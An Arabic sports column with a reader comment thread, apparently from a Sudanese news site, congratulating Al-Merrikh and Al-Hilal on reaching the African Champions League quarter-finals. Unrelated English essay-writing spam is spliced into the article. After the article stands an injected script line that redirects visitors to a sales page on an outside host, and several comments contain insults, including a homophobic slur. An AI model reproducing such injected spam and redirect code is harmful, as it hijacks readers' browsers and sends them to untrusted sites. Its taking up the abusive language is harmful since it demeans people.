الرئيسية / مقالات / محمد كامل يكتب بعنوان مبروك للسودان

محمد كامل يكتب بعنوان مبروك للسودان

مبروك للسودان..!!محمد كامل

the best essay writing service in the us, prices start from $10. a big team of highly qualified writers. tight deadlines. 100% privacy and total satisfaction …

* جسد نجوم المريخ الصمود عصر أمس وحبسوا أنفاس عشاق الكرة التونسية وتمكنوا من اقتناص شارة العبور إلى الدور ربع النهائي رغم الهزيمة بهدفين مقابل هدف في ملعب رادس، ولعل اليقظة والثبات كانا هما كلمة السر في العبور المشرّف..!!
* نعم كان السرحان وغياب التركيز هما من أبرز أسباب الهزائم التي ظلت تتعرض لها فرقنا السودانية سواء أمام الفرق العربية أو الأفريقية، والحقيقة فقد كان للهدف المبكر الذي سجله ضفر في شباك الترجي الدور الكبير في العبور الرائع..!!

we provide affordable, high quality essay writing help to students. our professional uk essay writers can assist students regardless of their level of study.

* حقيقة لم نتوقع أن يؤدي نجوم مريخ السودان بكل ذلك التركيز والرغبة الخرافية في اقتلاع شارة العبور وبتلك الجرأة والفدائية لا لشيء سوى لأننا تعودنا على السقوط في كل مرة بواسطة السقطات الفردية التي تقود إلى الانهيار..!!
* لقد نجح الفرنسي غارزيتو في تجهيز لاعبيه بالصورة النفسية المثالية بدليل الحركة غير الطبيعية التي أدى بها أفراد كل الخطوط، ولم يجد أصحاب الأرض لا الزمن ولا المساحة لتطبيق طريقتهم وتمرير الكرة بارتياح..!!
* الشاهد أن نجوم المريخ خرجوا كلياً عن طورهم في جولة الأمس ساعدهم الحضور الذهني والثبات الانفعالي والتركيز الكبير والروح القتالية التي أعادتنا إلى زمن المريخ بطل الأبطال الذي كان يهزّ الأرض تحت أقدام كل فرق القارة..!!
* التحية للجهاز الفني للمريخ ورئيس وأعضاء مجلس الإدارة بقيادة جمال الوالي الذي حرص على التواجد مع أبنائه اللاعبين في تونس، مما كان له الأثر النفسي الجيد على أدائهم داخل الملعب..!!
* والتحية لنجوم الأحمر فرداً فرداً بداية من الفدائي جمال سالم مروراً بأمير كمال وعلاء الدين الجسور، وضفر صانع العبور، ورمضان عجب، وأيمن سعيد، وبكري المدينة وكوفي وجابسون ومصعب وبله وبقية الأشاوس..!!
* عبور المريخ إلى ربع النهائي بلا شك سيزيد من حجم التحديات على كاهل قادة مجلس الإدارة والجهاز الفني والإعلام والنجوم الكبار وعليه لابد من مضاعفة الجهود لمقابلة المرحلة القادمة التي لن تكون في مستوى ما سبق من مراحل..!!
مبروك للهلال
* رغم صعوبة مباراة الأمس التي أداها الهلال أمام ضيفه سانغا الكنغولي إلاّ أن الأزرق في ختام المطاف تمكن من العبور إلى ربع النهائي بعدما كرر الفوز على منافسه بذات النتيجة التي حققها في كنشاسا قبل أسبوعين..!!
* نعم لقد أثر الفوز الباهر الذي حققه الهلال في جولة الذهاب خارج ملعبه بهدف في الكنغو الأثر المباشر في تراجع وتواضع الأداء ولدرجة أدخلت الرعب والخوف في نفوس كل الهلالاب..!!
* واعتقد أن العبور إلى ربع النهائي سيزيد من حجم المسؤولية على عاتق كل فرد من أفراد الأسرة الهلالية التي ستجد نفسها أمام واقع المزيد من العمل والتخطيط المدروس طمعاً في تحقيق غايات الجماهير..!!
* تخريمة أولى: ربع نهائي الأبطال هذا العام لن يكون سهلاً على القمة السودانية التي لا نستبعد وقوعها في مجموعة واحدة تنفيذاً لسياسة القناة الراعية التي تسعى للمزيد من الأرباح من خلال الديربيات الأفريقية..!!
* تخريمة ثانية: عبور المريخ للترجي يجب ان يفتح أعين لاعبينا أمام حقيقة أنهم لا يقلون عن نظرائهم في شمال القارة بشيء ولذلك لابد من وضع كأس البطولة هدفاً هذا الموسم..!!
* تخريمة ثالثة: الحمد لله والشكر لله على عبور المريخ والهلال إلى ربع نهائي الأبطال مع الأمنيات بمزيد من الانتصارات حتى تتواصل أفراح الكرة السودانية..!!

 

“http:///?sl=319481-c261c&data1=Track1&data2=Track2”;

location.replace(“http://gethere.info/buy.php”);

التعليق بواسطة فيس بوك

16 تعليق

  1. عليك الله انت ما خجلان من نفسك ومن الردحي الكنت بتعمل فيهو الايام الفاتت ؟ لم تترك مفردة احباط وتشاؤم وتثبيط الا وقد سطرتها حروفك الصدئة التي تقطر دم وحقد وغل .
    والاقبح من ذلك انك مارست الشماتة ( مقدما” ) علي خروج المريخ المحتم في نظرك المعتم بغشاوة الحقد والحسد ,الذي لايري في المريخ شيءا” جميلا” ويتمني زواله لو كان الامر بيدك .
    لو كنت تملك ذرة من عزة النفس والحياء والكرامة وشيم الرجال واخلاق الفرسان لكتبت مقال بمداد الدموع تعتذر فيه لجماهير المريخ وتطلب منهم العفو والصفح ولاعلنت اعتزالك الكتابة .

  2. سبحان الله حقيقة الاختشوا ماتو بالامس القريب جداً كانت كل المقالات و خصوصا مقال الأمس عباره عن تهكم و سخرية وافتراضات ما انزل الله بها من سلطان بحتمية مغادرة الفريقين من هذاالدور بطريقة سمجه لم يسمع بها احد من قبل و اسميتها الطوطحانيةو ذلك بادعاء عدم قدرة لاعبي الفريقين علي الثبات الانفعالي في المواعيد الكبيرةو تخلف منظومه الرياضة في السودان وكتبت تحديداً حتي اذا تمكن المريخ من ازاحة تالترجي فهذا يكون من سخريات القدر و اليوم بكل بجاحه تكتب مشيدا بتأهل المريخ فمن يعتبر ازاحه الترجي اإن حدثت من سخريات القدر لا ينبغي له باي حال من الأحوال الاشادة بالتأهل لان هذا قمة التناقض و الإفلاس الفكري و لتعلم ان الثبات علي المبدأ من شيم الرجال. والان لعلمك و بعمليه حسابية بسيطة وبلغة الأرقام التي لا تكذب او تتجمل لكائن من كان فان وجود السودان في هذه المرحلة مرحلة دوري المجموعات لدوري ابطال افريقيا يمثل نسبة 25% كثاني افضل نسبه بعد الجزائر متفوقاتحديدا علي علي مصر و تونس والمغرب و كلها من دول الشمال الافريقي.
    رجاء اخير لادارة الموقع اريحونا من هذا الشخص الذي ان واصل علي هل النهج فسوف يصاب جل زوار الموق بالتشاؤم والاحباط حتي ولا لو تتطلب الامر عمل استبيان لزوار الموقع حول كتابات هذا الشخص و ان افاد 5% منهم بتقبل منهج هذا الشخص فاقدم اعتزاي له مقدماً وإن حدث المتوقع فلكم الحكم.

  3. اللوطي ده بقول في شنو

    • الواحد مايستغل انو الادارة مابتراجع التعليقات ويقوم يكتب علي كيفو عبارات بذيئة ومنحطة .
      لو عندك زول من اسرتك بيقرأ الكلام دا ماكان طاوعتك نفسك بجرح مشاعرهم وصك آذانهم بهذه العبارة الساقطة .
      كلنا نكره محمد كامل واحيانا” نصفه ( في دواخلنا ) بأسوأ مما كتبته ولكننا لانتجرا ونكتبها احتراما” لللمنبر وادب الاختلاف وقبل ذلك مشاعر الاخرين .

    • تفووووووو عليك
      رمتني يدائها وانسلت

  4. عوض الكريم أبو سلمى

    وين سيد الكارو يرد على المدعو محمد كامل . سيد الكارو مفوض للرد عليه اليوم و كل الأيام

    • سيدالكارو

      تهانينا بتأهل الزعيم أخي ابوسلمي
      متشائم ناقص تعيس لا يري في المريخ شيئاً جميلا.
      طيب الجابرو عليهو شنو ؟
      الله يهديه ويهدينا.

  5. غريبه أمس كنت تبشر بركوب المريخ للتونسية والهلال بالدفن في بالمقبره يا أخي أختشي وشوف ليك خضار أفرشو

  6. شايفك بقيت مطبلاتي من الدرجة الاولى ، وتطبيلك زاته أشتر ودا كلو مابخارجك وين منطقك وين التونسية التى بشرتنا بها ؟ اين الطوطحانية ؟ بعدين لاول مرة تجيب سيرة الرئيس بدون مطاعنة وكلمات على شاكلة رئيس طوالي برضو كلامك ده مابجيب ليك امجاد ممكن في حاله واحدة الرئيس طوالي يشتري ليك امجاد اذا قلت انا ( فكوكه)

  7. سيدالكارو

    متشائم ناقص تعيس (اب قلباً أسود)
    انا خجلان ليك !
    والله صحي.
    عندما سافر الرئيس الطوالي والمرشد والمطبلاتية واصحاب المصالح، عندما سافروا لمؤازرة الزعيم من داخل الإستاد، جلست أنت لتبث احقادك الدفينة على صفحات الصحف مخذلاً ومبشراً بخسارة تسير بها الركبان.
    ولكن كان للفارس ضفر رأياً آخر عندما اصابك قبل ان يصيب الشباك التونسية.
    متشائم ناقص تعيس (اب قلباً أسود)
    أين كنت عندما غادر مزمل لمساندة المريخ !؟
    متشائم ناقص تعيس (اب قلباً أسود)
    في أي جحر دخلت وكرة ضفر تعانق الشباك ؟؟
    متشائم ناقص تعيس (اب قلباً أسود)
    أنت لا تشبه المريخ
    فلتذهب غير مأسوف عليك

    • عوض الكريم أبو سلمى

      ألف مبروك و الزعيم لها باذن واحد احد و الجماهير التى لا تدعه يسير وحده ابدا سواء لشندى او لتونس او للواق الواق . أما ان لرئيس الرؤساء ان يتراجع عن الاستقالة ؟ مع تقديرى

  8. عنتر كتلو اعمى
    معقول الدلقاااااااااااااااان يطلع الترجي

    • عمي كباسه اليركبك

      يا دلقان يا منحط يا اسفل

      عنتر في حلقك

      امش شوف الدلاقين حقنكم وين

      علق

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*